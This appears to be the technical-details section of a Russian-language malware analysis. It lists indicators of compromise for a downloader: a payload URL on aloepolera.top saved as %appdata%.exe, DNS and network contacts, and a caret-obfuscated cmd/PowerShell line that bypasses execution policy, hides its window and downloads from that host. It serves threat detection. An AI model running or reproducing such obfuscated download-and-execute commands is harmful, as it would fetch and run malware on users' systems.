Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WErsh^El^l.ex^e^ -Exe^C^u^tIONPOLi^cy ^BYPa^ss^ ^-^NOPROF^iL^e -WiN^doW^s^TY^Le ^hI^D^dE^n^ ^(^N^EW-^o^BjECt SYs^tem^.NEt.we^bcL^iE^n^T)^.Do^WNLOa^d^fIl^e^('http://aloepolera.to...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "pO^WErsh^El^l.ex^e^ -Exe^C^u^tIONPOLi^cy ^BYPa^ss^ ^-^NOPROF^iL^e -WiN^doW^s^TY^Le ^hI^D^dE^n^ ^(^N^EW-^o^BjECt SYs^tem^.NEt.we^bcL^iE^n^T)^.Do^WNLOa^d^fIl^e^('http://aloepolera.to...' (со скрытым окном)